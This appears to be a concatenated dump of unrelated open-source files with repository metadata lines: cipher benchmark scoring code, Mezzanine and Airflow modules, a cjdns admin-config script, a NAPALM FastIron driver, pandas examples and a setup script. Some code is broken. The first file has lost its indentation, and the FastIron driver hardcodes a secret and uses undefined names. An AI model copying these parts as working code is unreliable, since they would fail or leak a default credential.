# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from Scenario2 import Constants
__author__ = 'daniel.dinu'
class SelectedCipher:
def __init__(self, name, block_size, key_size, link, security_level):
"""
Initialize selected cipher
:param name: Selected cipher name
:param block_size: Selected cipher block size
:param key_size: Selected cipher key size
:param link: Selected cipher link
:param security_level: Selected cipher security level
"""
self.name = name
self.block_size = block_size
self.key_size = key_size
self.link = link
self.security_level = security_level
self.name_link = Constants.MEDIAWIKI_CIPHER_NAME_FORMAT.format(self.link, self.name)
self.avr_metrics1 = ''
self.avr_metrics2 = ''
self.avr_metrics3 = ''
self.msp_metrics1 = ''
self.msp_metrics2 = ''
self.msp_metrics3 = ''
self.arm_metrics1 = ''
self.arm_metrics2 = ''
self.arm_metrics3 = ''
self.avr_version1 = 0
self.avr_version2 = 0
self.avr_version3 = 0
self.msp_version1 = 0
self.msp_version2 = 0
self.msp_version3 = 0
self.arm_version1 = 0
self.arm_version2 = 0
self.arm_version3 = 0
self.avr_compiler_options1 = ''
self.avr_compiler_options2 = ''
self.avr_compiler_options3 = ''
self.msp_compiler_options1 = ''
self.msp_compiler_options2 = ''
self.msp_compiler_options3 = ''
self.arm_compiler_options1 = ''
self.arm_compiler_options2 = ''
self.arm_compiler_options3 = ''
self.fom1_avr = 0
self.fom2_avr = 0
self.fom3_avr = 0
self.fom1_msp = 0
self.fom2_msp = 0
self.fom3_msp = 0
self.fom1_arm = 0
self.fom2_arm = 0
self.fom3_arm = 0
self.fom1 = 0
self.fom2 = 0
self.fom3 = 0
def compute_fom1(self,
avr_min_code_size,
msp_min_code_size,
arm_min_code_size,
avr_min_ram,msp_min_ram,
arm_min_ram,
avr_min_execution_time,
msp_min_execution_time,
arm_min_execution_time,
avr_max_code_size,
msp_max_code_size,
arm_max_code_size,
avr_max_ram,
msp_max_ram,
arm_max_ram,
avr_max_execution_time,
msp_max_execution_time,
arm_max_execution_time):
"""
Compute cipher implementation FOM 1
:param avr_min_code_size: AVR min code size
:param msp_min_code_size: MSP min code size
:param arm_min_code_size: ARM min code size
:param avr_min_ram: AVR min RAM
:param msp_min_ram: MSP min RAM
:param arm_min_ram: ARM min RAM
:param avr_min_execution_time: AVR min execution time
:param msp_min_execution_time: MSP min execution time
:param arm_min_execution_time: ARM min execution time
:param avr_max_code_size: AVR max code size
:param msp_max_code_size: MSP max code size
:param arm_max_code_size: ARM max code size
:param avr_max_ram: AVR max RAM
:param msp_max_ram: MSP max RAM
:param arm_max_ram: ARM max RAM
:param avr_max_execution_time: AVR max execution time
:param msp_max_execution_time: MSP max execution time
:param arm_max_execution_time: ARM max execution time
"""
# AVR
avr_code_size = self.avr_metrics1.code_size_e
avr_ram = self.avr_metrics1.ram_data + self.avr_metrics1.ram_stack_e
avr_execution_time = self.avr_metrics1.execution_time_e
# MSP
msp_code_size = self.msp_metrics1.code_size_e
msp_ram = self.msp_metrics1.ram_data + self.msp_metrics1.ram_stack_e
msp_execution_time = self.msp_metrics1.execution_time_e
# ARM
arm_code_size = self.arm_metrics1.code_size_e
arm_ram = self.arm_metrics1.ram_data + self.arm_metrics1.ram_stack_e
arm_execution_time = self.arm_metrics1.execution_time_e
# AVR weights
avr_code_size_weight = Constants.FOM1_AVR_CODE_SIZE_WEIGHT
avr_ram_weight = Constants.FOM1_AVR_RAM_WEIGHT
avr_execution_time_weight = Constants.FOM1_AVR_EXECUTION_TIME_WEIGHT
# MSP weights
msp_code_size_weight = Constants.FOM1_MSP_CODE_SIZE_WEIGHT
msp_ram_weight = Constants.FOM1_MSP_RAM_WEIGHT
msp_execution_time_weight = Constants.FOM1_MSP_EXECUTION_TIME_WEIGHT
# ARM weights
arm_code_size_weight = Constants.FOM1_ARM_CODE_SIZE_WEIGHT
arm_ram_weight = Constants.FOM1_ARM_RAM_WEIGHT
arm_execution_time_weight = Constants.FOM1_ARM_EXECUTION_TIME_WEIGHT
# AVR
avr_fom_code_size = avr_code_size_weight * (avr_code_size / avr_min_code_size)
avr_fom_ram = avr_ram_weight * (avr_ram / avr_min_ram)
avr_fom_execution_time = avr_execution_time_weight * (avr_execution_time / avr_min_execution_time)
avr_fom = avr_fom_code_size + avr_fom_ram + avr_fom_execution_time
# MSP
msp_fom_code_size = msp_code_size_weight * (msp_code_size / msp_min_code_size)
msp_fom_ram = msp_ram_weight * (msp_ram / msp_min_ram)
msp_fom_execution_time = msp_execution_time_weight * (msp_execution_time / msp_min_execution_time)
msp_fom = msp_fom_code_size + msp_fom_ram + msp_fom_execution_time
# ARM
arm_fom_code_size = arm_code_size_weight * (arm_code_size / arm_min_code_size)
arm_fom_ram = arm_ram_weight * (arm_ram / arm_min_ram)
arm_fom_execution_time = arm_execution_time_weight * (arm_execution_time / arm_min_execution_time)
arm_fom = arm_fom_code_size + arm_fom_ram + arm_fom_execution_time
if Constants.DEBUG_ON == Constants.DEBUG:
print(Constants.CIPHER_IMPLEMENTATION_FOM1_DETAILS.format(avr_fom_code_size,
avr_fom_ram,
avr_fom_execution_time,
avr_fom,
msp_fom_code_size,
msp_fom_ram,
msp_fom_execution_time,
msp_fom,
arm_fom_code_size,
arm_fom_ram,
arm_fom_execution_time,
arm_fom))
# FOM 1
self.fom1_avr = avr_fom
self.fom1_msp = msp_fom
self.fom1_arm = arm_fom
def compute_fom2(self,
avr_min_code_size,
msp_min_code_size,
arm_min_code_size,
avr_min_ram,
msp_min_ram,
arm_min_ram,
avr_min_execution_time,
msp_min_execution_time,
arm_min_execution_time,
avr_max_code_size,
msp_max_code_size,
arm_max_code_size,
avr_max_ram,
msp_max_ram,
arm_max_ram,
avr_max_execution_time,
msp_max_execution_time,
arm_max_execution_time):
"""
Compute cipher implementation FOM 2
:param avr_min_code_size: AVR min code size
:param msp_min_code_size: MSP min code size
:param arm_min_code_size: ARM min code size
:param avr_min_ram: AVR min RAM
:param msp_min_ram: MSP min RAM
:param arm_min_ram: ARM min RAM
:param avr_min_execution_time: AVR min execution time
:param msp_min_execution_time: MSP min execution time
:param arm_min_execution_time: ARM min execution time
:param avr_max_code_size: AVR max code size
:param msp_max_code_size: MSP max code size
:param arm_max_code_size: ARM max code size
:param avr_max_ram: AVR max RAM
:param msp_max_ram: MSP max RAM
:param arm_max_ram: ARM max RAM
:param avr_max_execution_time: AVR max execution time
:param msp_max_execution_time: MSP max execution time
:param arm_max_execution_time: ARM max execution time
"""
# AVR
avr_code_size = self.avr_metrics2.code_size_e
avr_ram = self.avr_metrics2.ram_data + self.avr_metrics2.ram_stack_e
avr_execution_time = self.avr_metrics2.execution_time_e
# MSP
msp_code_size = self.msp_metrics2.code_size_e
msp_ram = self.msp_metrics2.ram_data + self.msp_metrics2.ram_stack_e
msp_execution_time = self.msp_metrics2.execution_time_e
# ARM
arm_code_size = self.arm_metrics2.code_size_e
arm_ram = self.arm_metrics2.ram_data + self.arm_metrics2.ram_stack_e
arm_execution_time = self.arm_metrics2.execution_time_e
# AVR weights
avr_code_size_weight = Constants.FOM2_AVR_CODE_SIZE_WEIGHT
avr_ram_weight = Constants.FOM2_AVR_RAM_WEIGHT
avr_execution_time_weight = Constants.FOM2_AVR_EXECUTION_TIME_WEIGHT
# MSP weights
msp_code_size_weight = Constants.FOM2_MSP_CODE_SIZE_WEIGHT
msp_ram_weight = Constants.FOM2_MSP_RAM_WEIGHT
msp_execution_time_weight = Constants.FOM2_MSP_EXECUTION_TIME_WEIGHT
# ARM weights
arm_code_size_weight = Constants.FOM2_ARM_CODE_SIZE_WEIGHT
arm_ram_weight = Constants.FOM2_ARM_RAM_WEIGHT
arm_execution_time_weight = Constants.FOM2_ARM_EXECUTION_TIME_WEIGHT
# AVR
avr_fom_code_size = avr_code_size_weight * (avr_code_size / Constants.AVR_MAX_ROM)
avr_fom_ram = avr_ram_weight * (avr_ram / Constants.AVR_MAX_RAM)
avr_fom_execution_time = avr_execution_time_weight
avr_fom = avr_fom_code_size + avr_fom_ram + avr_fom_execution_time
# MSP
msp_fom_code_size = msp_code_size_weight * (msp_code_size / Constants.MSP_MAX_ROM)
msp_fom_ram = msp_ram_weight * (msp_ram / Constants.MSP_MAX_RAM)
msp_fom_execution_time = msp_execution_time_weight
msp_fom = msp_fom_code_size + msp_fom_ram + msp_fom_execution_time
# ARM
arm_fom_code_size = arm_code_size_weight * (arm_code_size / Constants.ARM_MAX_ROM)
arm_fom_ram = arm_ram_weight * (arm_ram / Constants.ARM_MAX_RAM)
arm_fom_execution_time = arm_execution_time_weight
arm_fom = arm_fom_code_size + arm_fom_ram + arm_fom_execution_time
if Constants.DEBUG_ON == Constants.DEBUG:
print(Constants.CIPHER_IMPLEMENTATION_FOM2_DETAILS.format(avr_fom_code_size,
avr_fom_ram,
avr_fom_execution_time,
avr_fom,
msp_fom_code_size,
msp_fom_ram,
msp_fom_execution_time,
msp_fom,
arm_fom_code_size,
arm_fom_ram,
arm_fom_execution_time,
arm_fom))
# FOM 2
self.fom2_avr = avr_fom
self.fom2_msp = msp_fom
self.fom2_arm = arm_fom
def compute_fom3(self,
avr_min_code_size,
msp_min_code_size,
arm_min_code_size,
avr_min_ram,
msp_min_ram,
arm_min_ram,
avr_min_execution_time,
msp_min_execution_time,
arm_min_execution_time,
avr_max_code_size,
msp_max_code_size,
arm_max_code_size,
avr_max_ram,
msp_max_ram,
arm_max_ram,
avr_max_execution_time,
msp_max_execution_time,
arm_max_execution_time):
"""
Compute cipher implementation FOM 3
:param avr_min_code_size: AVR min code size
:param msp_min_code_size: MSP min code size
:param arm_min_code_size: ARM min code size
:param avr_min_ram: AVR min RAM
:param msp_min_ram: MSP min RAM
:param arm_min_ram: ARM min RAM
:param avr_min_execution_time: AVR min execution time
:param msp_min_execution_time: MSP min execution time
:param arm_min_execution_time: ARM min execution time
:param avr_max_code_size: AVR max code size
:param msp_max_code_size: MSP max code size
:param arm_max_code_size: ARM max code size
:param avr_max_ram: AVR max RAM
:param msp_max_ram: MSP max RAM
:param arm_max_ram: ARM max RAM
:param avr_max_execution_time: AVR max execution time
:param msp_max_execution_time: MSP max execution time
:param arm_max_execution_time: ARM max execution time
"""
# AVR
avr_code_size = self.avr_metrics3.code_size_e
avr_ram = self.avr_metrics3.ram_data + self.avr_metrics3.ram_stack_e
avr_execution_time = self.avr_metrics3.execution_time_e
# MSP
msp_code_size = self.msp_metrics3.code_size_e
msp_ram = self.msp_metrics3.ram_data + self.msp_metrics3.ram_stack_e
msp_execution_time = self.msp_metrics3.execution_time_e
# ARM
arm_code_size = self.arm_metrics3.code_size_e
arm_ram = self.arm_metrics3.ram_data + self.arm_metrics3.ram_stack_e
arm_execution_time = self.arm_metrics3.execution_time_e
# AVR weights
avr_code_size_weight = Constants.FOM3_AVR_CODE_SIZE_WEIGHT
avr_ram_weight = Constants.FOM3_AVR_RAM_WEIGHT
avr_execution_time_weight = Constants.FOM3_AVR_EXECUTION_TIME_WEIGHT
# MSP weights
msp_code_size_weight = Constants.FOM3_MSP_CODE_SIZE_WEIGHT
msp_ram_weight = Constants.FOM3_MSP_RAM_WEIGHT
msp_execution_time_weight = Constants.FOM3_MSP_EXECUTION_TIME_WEIGHT
# ARM weights
arm_code_size_weight = Constants.FOM3_ARM_CODE_SIZE_WEIGHT
arm_ram_weight = Constants.FOM3_ARM_RAM_WEIGHT
arm_execution_time_weight = Constants.FOM3_ARM_EXECUTION_TIME_WEIGHT
# AVR
avr_fom_code_size = avr_code_size_weight
avr_fom_ram = avr_ram_weight
avr_fom_execution_time = avr_execution_time_weight * (avr_execution_time / avr_min_execution_time)
avr_fom = avr_fom_code_size + avr_fom_ram + avr_fom_execution_time
# MSP
msp_fom_code_size = msp_code_size_weight
msp_fom_ram = msp_ram_weight
msp_fom_execution_time = msp_execution_time_weight * (msp_execution_time / msp_min_execution_time)
msp_fom = msp_fom_code_size + msp_fom_ram + msp_fom_execution_time
# ARM
arm_fom_code_size = arm_code_size_weight
arm_fom_ram = arm_ram_weight
arm_fom_execution_time = arm_execution_time_weight * (arm_execution_time / arm_min_execution_time)
arm_fom = arm_fom_code_size + arm_fom_ram + arm_fom_execution_time
if Constants.DEBUG_ON == Constants.DEBUG:
print(Constants.CIPHER_IMPLEMENTATION_FOM3_DETAILS.format(avr_fom_code_size,
avr_fom_ram,
avr_fom_execution_time,
avr_fom,
msp_fom_code_size,
msp_fom_ram,
msp_fom_execution_time,
msp_fom,
arm_fom_code_size,
arm_fom_ram,
arm_fom_execution_time,
arm_fom))
# FOM 3
self.fom3_avr = avr_fom
self.fom3_msp = msp_fom
self.fom3_arm = arm_fom
| bsd-3-clause | -5,239,676,012,041,426,000 | 40.664399 | 106 | 0.525852 | false |
douglaskastle/mezzanine | mezzanine/accounts/__init__.py | 34 | 3211 | """
Provides features for non-staff user accounts, such as login, signup
with optional email verification, password reset, and integration
with user profiles models defined by the ``AUTH_PROFILE_MODULE``
setting. Some utility functions for probing the profile model are
included below.
"""
from __future__ import unicode_literals
from django.apps import apps
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ImproperlyConfigured
from mezzanine.utils.importing import import_dotted_path
class ProfileNotConfigured(Exception):
pass
def get_profile_model():
"""
Returns the Mezzanine profile model, defined in
``settings.AUTH_PROFILE_MODULE``, or ``None`` if no profile
model is configured.
"""
if not getattr(settings, "AUTH_PROFILE_MODULE", None):
raise ProfileNotConfigured
try:
return apps.get_model(settings.AUTH_PROFILE_MODULE)
except ValueError:
raise ImproperlyConfigured("AUTH_PROFILE_MODULE must be of "
"the form 'app_label.model_name'")
except LookupError:
raise ImproperlyConfigured("AUTH_PROFILE_MODULE refers to "
"model '%s' that has not been installed"
% settings.AUTH_PROFILE_MODULE)
def get_profile_for_user(user):
"""
Returns site-specific profile for this user. Raises
``ProfileNotConfigured`` if ``settings.AUTH_PROFILE_MODULE`` is not
set, and ``ImproperlyConfigured`` if the corresponding model can't
be found.
"""
if not hasattr(user, '_mezzanine_profile'):
# Raises ProfileNotConfigured if not bool(AUTH_PROFILE_MODULE)
profile_model = get_profile_model()
profile_manager = profile_model._default_manager.using(user._state.db)
user_field = get_profile_user_fieldname(profile_model, user.__class__)
profile, created = profile_manager.get_or_create(**{user_field: user})
profile.user = user
user._mezzanine_profile = profile
return user._mezzanine_profile
def get_profile_form():
"""
Returns the profile form defined by
``settings.ACCOUNTS_PROFILE_FORM_CLASS``.
"""
from mezzanine.conf import settings
try:
return import_dotted_path(settings.ACCOUNTS_PROFILE_FORM_CLASS)
except ImportError:
raise ImproperlyConfigured("Value for ACCOUNTS_PROFILE_FORM_CLASS "
"could not be imported: %s" %
settings.ACCOUNTS_PROFILE_FORM_CLASS)
def get_profile_user_fieldname(profile_model=None, user_model=None):
"""
Returns the name of the first field on the profile model that
points to the ``auth.User`` model.
"""
Profile = profile_model or get_profile_model()
User = user_model or get_user_model()
for field in Profile._meta.fields:
if field.rel and field.rel.to == User:
return field.name
raise ImproperlyConfigured("Value for AUTH_PROFILE_MODULE does not "
"contain a ForeignKey field for auth.User: %s"
% Profile.__name__)
| bsd-2-clause | 2,782,236,874,298,456,000 | 34.677778 | 78 | 0.655559 | false |
DinoCow/airflow | tests/api_connexion/test_parameters.py | 7 | 4550 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
from pendulum import DateTime
from pendulum.tz.timezone import Timezone
from airflow.api_connexion.exceptions import BadRequest
from airflow.api_connexion.parameters import (
check_limit,
format_datetime,
format_parameters,
validate_istimezone,
)
from airflow.utils import timezone
from tests.test_utils.config import conf_vars
class TestValidateIsTimezone(unittest.TestCase):
def setUp(self) -> None:
from datetime import datetime
self.naive = datetime.now()
self.timezoned = datetime.now(tz=timezone.utc)
def test_gives_400_for_naive(self):
with self.assertRaises(BadRequest):
validate_istimezone(self.naive)
def test_timezone_passes(self):
assert validate_istimezone(self.timezoned) is None
class TestDateTimeParser(unittest.TestCase):
def setUp(self) -> None:
self.default_time = '2020-06-13T22:44:00+00:00'
self.default_time_2 = '2020-06-13T22:44:00Z'
def test_works_with_datestring_ending_00_00(self):
datetime = format_datetime(self.default_time)
datetime2 = timezone.parse(self.default_time)
assert datetime == datetime2
assert datetime.isoformat() == self.default_time
def test_works_with_datestring_ending_with_zed(self):
datetime = format_datetime(self.default_time_2)
datetime2 = timezone.parse(self.default_time_2)
assert datetime == datetime2
assert datetime.isoformat() == self.default_time # python uses +00:00 instead of Z
def test_raises_400_for_invalid_arg(self):
invalid_datetime = '2020-06-13T22:44:00P'
with self.assertRaises(BadRequest):
format_datetime(invalid_datetime)
class TestMaximumPagelimit(unittest.TestCase):
@conf_vars({("api", "maximum_page_limit"): "320"})
def test_maximum_limit_return_val(self):
limit = check_limit(300)
self.assertEqual(limit, 300)
@conf_vars({("api", "maximum_page_limit"): "320"})
def test_maximum_limit_returns_configured_if_limit_above_conf(self):
limit = check_limit(350)
self.assertEqual(limit, 320)
@conf_vars({("api", "maximum_page_limit"): "1000"})
def test_limit_returns_set_max_if_give_limit_is_exceeded(self):
limit = check_limit(1500)
self.assertEqual(limit, 1000)
@conf_vars({("api", "fallback_page_limit"): "100"})
def test_limit_of_zero_returns_default(self):
limit = check_limit(0)
self.assertEqual(limit, 100)
@conf_vars({("api", "maximum_page_limit"): "1500"})
def test_negative_limit_raises(self):
with self.assertRaises(BadRequest):
check_limit(-1)
class TestFormatParameters(unittest.TestCase):
def test_should_works_with_datetime_formatter(self):
decorator = format_parameters({"param_a": format_datetime})
endpoint = mock.MagicMock()
decorated_endpoint = decorator(endpoint)
decorated_endpoint(param_a='2020-01-01T0:0:00+00:00')
endpoint.assert_called_once_with(param_a=DateTime(2020, 1, 1, 0, tzinfo=Timezone('UTC')))
def test_should_propagate_exceptions(self):
decorator = format_parameters({"param_a": format_datetime})
endpoint = mock.MagicMock()
decorated_endpoint = decorator(endpoint)
with self.assertRaises(BadRequest):
decorated_endpoint(param_a='XXXXX')
@conf_vars({("api", "maximum_page_limit"): "100"})
def test_should_work_with_limit(self):
decorator = format_parameters({"limit": check_limit})
endpoint = mock.MagicMock()
decorated_endpoint = decorator(endpoint)
decorated_endpoint(limit=89)
endpoint.assert_called_once_with(limit=89)
| apache-2.0 | 8,364,605,682,604,583,000 | 35.99187 | 97 | 0.689451 | false |
eXcomm/cjdns | contrib/python/cjdnsadminmaker.py | 6 | 3533 | #!/usr/bin/env python
import json
import os
import sys
import subprocess
# possibly search for running cjdroute processes and check the same folder as they're in
# and/or running find on the home folder
## Wanted: Everyone's favorite place to store their shit.
conflocations = ["/etc/cjdroute.conf",
os.getenv("HOME") + "/cjdroute.conf",
os.getenv("HOME") + "/cjdns/cjdroute.conf",
"/usr/local/opt/cjdns/cjdroute.conf"]
cjdnslocations = ["/opt/cjdns",
os.getenv("HOME") + "/cjdns",
os.getenv("HOME") + "/cjdns-git",
"/usr/local/opt/cjdns"]
cjdnsadmin = {}
if os.path.isfile(os.getenv("HOME") + "/.cjdnsadmin"):
validjson = False
try:
cjdnsadmin = json.load(open(os.getenv("HOME") + "/.cjdnsadmin"))
validjson = True
except ValueError:
pass
if validjson:
while True:
r = raw_input(os.getenv("HOME") + "/.cjdnsadmin appears to be a valid JSON file. Update? [Y/n] ")
if r.lower() == "n":
sys.exit()
elif r.lower() == "y" or r == "":
break
else:
print "Invalid response, please enter either y or n"
else:
while True:
r = raw_input(os.getenv("HOME") + "/.cjdnsadmin appears to be a file. Overwrite? [y/N] ")
if r.lower() == "n" or r == "":
sys.exit()
elif r.lower() == "y":
break
else:
print "Invalid response, please enter either y or n"
else:
print "This script will attempt to create " + os.getenv("HOME") + "/.cjdnsadmin"
def validjson(conf):
print "Making valid JSON out of " + conf
print "First, we need to find the cleanconfig program"
cleanconfig = ""
i = 0
while not os.path.isfile(cleanconfig):
if i < len(cjdnslocations):
cleanconfig = cjdnslocations[i] + "/cleanconfig"
i += 1
else:
print "Failed to find cleanconfig"
print "Please tell me where it is"
cleanconfig = raw_input("HINT: <cjdns git>/cleanconfig: ")
print "Using " + cleanconfig
process = subprocess.Popen([cleanconfig], stdin=open(conf), stdout=subprocess.PIPE)
cleanconf = process.stdout.read()
try:
return json.loads(cleanconf)
except ValueError:
open("debug.log", "w+").write(cleanconf)
print "Failed to parse! Check debug.log"
sys.exit(1)
done = False
i = 0
while not done:
if i <= len(conflocations):
conf = conflocations[i]
i += 1
else:
conf = raw_input("Can't find cjdroute.conf, please give the path to it here: ")
sys.exit(1)
if os.path.isfile(conf):
print "Loading " + conf
try:
cjdrouteconf = json.load(open(conf))
except ValueError:
cjdrouteconf = validjson(conf)
except IOError:
print "Error opening " + conf + ". Do we have permission to access it?"
print "Hint: Try running this as root"
sys.exit(1)
addr, port = cjdrouteconf['admin']['bind'].split(":")
cjdnsadmin["addr"] = addr
cjdnsadmin["port"] = int(port)
cjdnsadmin["password"] = cjdrouteconf['admin']['password']
cjdnsadmin["config"] = conf
adminfile = open(os.getenv("HOME") + "/.cjdnsadmin", "w+")
adminfile.write(json.dumps(cjdnsadmin, indent=4))
adminfile.close()
print "Done! Give it a shot, why dont ya"
done = True
| gpl-3.0 | 4,681,896,428,260,077,000 | 32.971154 | 109 | 0.57062 | false |
gaberger/napalm-brocade-fastiron | napalm_brocade_fastiron/fastiron.py | 1 | 4284 | # Copyright 2017 Brocade Communications. All rights reserved.
#
# The contents of this file are licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""
Napalm driver for Brocade FastIron.
Read https://napalm.readthedocs.io for more information.
"""
from napalm_base.base import NetworkDriver
from napalm_base.exceptions import (
ConnectionException,
SessionLockedException,
MergeConfigException,
ReplaceConfigException,
CommandErrorException,
)
from utils.utils import read_txt_file
from netmiko import ConnectHandler
import textfsm
import socket
class FastIronDriver(NetworkDriver):
"""Napalm driver for FastIron."""
def __init__(self, hostname, username, password, timeout=60, optional_args=None):
"""Constructor."""
self.hostname = hostname
self.username = username
self.password = password
self.timeout = timeout
if optional_args is None:
optional_args = {}
def open(self):
"""Implementation of NAPALM method open."""
self.session = ConnectHandler(device_type = 'brocade_fastiron',
ip = self.hostname,
username = self.username,
password = self.password,
secret = "test",
verbose = True,
use_keys = False,
session_timeout = 300)
self.session.session_preparation()
def close(self):
"""Implementation of NAPALM method close."""
self.session.disconnect()
def send_command(self, command):
"""Wrapper for self.device.send.command().
If command is a list will iterate through commands until valid command.
"""
try:
if isinstance(command, list):
for cmd in command:
output = self.session.send_command(cmd)
# TODO Check exception handling
if "% Invalid" not in output:
break
else:
output = self.session.send_command(command)
return output
except (socket.error, EOFError) as e:
raise ConnectionClosedException(str(e))
def show_version(self):
output = self.send_command(['show version'])
tplt = read_txt_file("napalm_brocade_fastiron/utils/textfsm_templates/fastiron_show_version.template")
t = textfsm.TextFSM(tplt)
result = t.ParseText(output)
return result
def show_interfaces(self):
output = self.send_command(['show interfaces'])
tplt = read_txt_file("napalm_brocade_fastiron/utils/textfsm_templates/fastiron_show_interfaces.template")
t = textfsm.TextFSM(tplt)
result = t.ParseText(output)
return result
def get_facts(self):
commands = []
commands.append('show version')
try:
result = self.send_command(commands)
print(result)
facts = p.parse_get_facts(result)
except:
raise
return {
'hostname': "-".join((facts['model'], facts['os_version'])),
'fqdn': "-".join((facts['model'], facts['os_version'])),
'vendor': u'Brocade',
'model': facts['model'],
'serial_number': facts['serial_no'],
'os_version': facts['os_version'],
'uptime': facts['uptime'],
# 'interface_list': interfaces,
}
return sv
def get_interfaces(self):
pass
| apache-2.0 | 2,448,725,534,546,563,000 | 33.837398 | 113 | 0.568861 | false |
nkmk/python-snippets | notebook/pandas_read_excel.py | 1 | 2434 | import pandas as pd
print(pd.__version__)
# 1.2.2
df = pd.read_excel('data/src/sample.xlsx', index_col=0)
print(df)
# A B C
# one 11 12 13
# two 21 22 23
# three 31 32 33
print(type(df))
# <class 'pandas.core.frame.DataFrame'>
df_sheet_index = pd.read_excel('data/src/sample.xlsx', sheet_name=0, index_col=0)
print(df_sheet_index)
# A B C
# one 11 12 13
# two 21 22 23
# three 31 32 33
df_sheet_name = pd.read_excel('data/src/sample.xlsx', sheet_name='sheet2', index_col=0)
print(df_sheet_name)
# AA BB CC
# ONE 11 12 13
# TWO 21 22 23
# THREE 31 32 33
df_sheet_multi = pd.read_excel('data/src/sample.xlsx', sheet_name=[0, 'sheet2'], index_col=0)
print(type(df_sheet_multi))
# <class 'dict'>
print(len(df_sheet_multi))
# 2
print(df_sheet_multi.keys())
# dict_keys([0, 'sheet2'])
print(df_sheet_multi[0])
# A B C
# one 11 12 13
# two 21 22 23
# three 31 32 33
print(type(df_sheet_multi[0]))
# <class 'pandas.core.frame.DataFrame'>
print(df_sheet_multi['sheet2'])
# AA BB CC
# ONE 11 12 13
# TWO 21 22 23
# THREE 31 32 33
print(type(df_sheet_multi['sheet2']))
# <class 'pandas.core.frame.DataFrame'>
df_sheet_all = pd.read_excel('data/src/sample.xlsx', sheet_name=None, index_col=0)
print(type(df_sheet_all))
# <class 'dict'>
print(df_sheet_all.keys())
# dict_keys(['sheet1', 'sheet2'])
df_header_index = pd.read_excel('data/src/sample.xlsx', header=None, index_col=None)
print(df_header_index)
# 0 1 2 3
# 0 NaN A B C
# 1 one 11 12 13
# 2 two 21 22 23
# 3 three 31 32 33
print(df_header_index.columns)
# Int64Index([0, 1, 2, 3], dtype='int64')
print(df_header_index.index)
# RangeIndex(start=0, stop=4, step=1)
df_default = pd.read_excel('data/src/sample.xlsx')
print(df_default)
# Unnamed: 0 A B C
# 0 one 11 12 13
# 1 two 21 22 23
# 2 three 31 32 33
print(df_default.columns)
# Index(['Unnamed: 0', 'A', 'B', 'C'], dtype='object')
print(df_default.index)
# RangeIndex(start=0, stop=3, step=1)
print(pd.read_excel('data/src/sample.xlsx', index_col=0))
# A B C
# one 11 12 13
# two 21 22 23
# three 31 32 33
df_use_skip = pd.read_excel('data/src/sample.xlsx', index_col=0,
usecols=[0, 1, 3], skiprows=[1], skipfooter=1)
print(df_use_skip)
# A C
# two 21 23
| mit | 1,928,512,420,426,944,000 | 22.862745 | 93 | 0.595316 | false |
sdiehl/numpush | setup.py | 1 | 3346 | import os
import shutil
import numpy as np
from os.path import join as pjoin
from distutils.core import setup, Command
from distutils.extension import Extension
from Cython.Distutils import build_ext
extensions = [
Extension(
"numpush.posix_io.iothread",
["numpush/posix_io/iothread.pyx"],
include_dirs=[],
),
Extension(
"numpush.posix_io.splice",
["numpush/posix_io/splice.pyx"],
include_dirs=[],
),
Extension(
"numpush.posix_io.sendfile",
["numpush/posix_io/sendfile.pyx"],
include_dirs=[],
),
Extension("numpush.moose_store.moose",
["numpush/moose_store/moose.pyx"],
include_dirs=[],
),
Extension(
"numpush.zmq_blosc",
["numpush/zmq_blosc.pyx"],
include_dirs=['include/blosc'],
libraries=['zmq', 'pthread'],
library_dirs=["blosc"],
extra_objects=["include/blosc/blosc.so"],
extra_compile_args=['-msse2'],
),
]
def find_packages():
packages = []
for dir,subdirs,files in os.walk('numpush'):
package = dir.replace(os.path.sep, '.')
if '__init__.py' not in files:
# not a package
continue
packages.append(package)
return packages
# Adapted from the pyzmq setup.py realeased under the BSD.
class CleanCommand(Command):
"""Custom distutils command to clean the .so and .pyc files."""
user_options = [ ]
def initialize_options(self):
self._clean_me = []
self._clean_trees = []
for root, dirs, files in list(os.walk('numpush')):
for f in files:
if os.path.splitext(f)[-1] in ('.pyc', '.so', '.o', '.pyd'):
self._clean_me.append(pjoin(root, f))
for d in dirs:
if d == '__pycache__':
self._clean_trees.append(pjoin(root, d))
for d in ('build',):
if os.path.exists(d):
self._clean_trees.append(d)
def finalize_options(self):
pass
def run(self):
for clean_me in self._clean_me:
try:
os.unlink(clean_me)
except Exception:
pass
for clean_tree in self._clean_trees:
try:
shutil.rmtree(clean_tree)
except Exception:
pass
#-----------------------------------------------------------------------------
# Main setup
#-----------------------------------------------------------------------------
long_desc = \
"""
"""
setup(
name = "numpush",
version = '0.0.1dev',
packages = find_packages(),
ext_modules = extensions,
package_data = {},
author = "Stephen Diehl",
author_email = "[email protected]",
url = 'http://github.com/sdiehl/numpush',
download_url = 'http://github.com/sdiehl/numpush/downloads',
description = "Distributed data/code push for Numpy derivative structures",
long_description = long_desc,
license = "MIT",
cmdclass = {'build_ext': build_ext, 'clean': CleanCommand},
classifiers = [
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: POSIX',
'Topic :: System :: Networking',
'Programming Language :: Python :: 2.7',
]
)
| mit | -6,841,776,423,473,508,000 | 27.598291 | 79 | 0.532576 | false |
cdecker/bitcoin | test/functional/wallet_watchonly.py | 21 | 4426 | #!/usr/bin/env python3
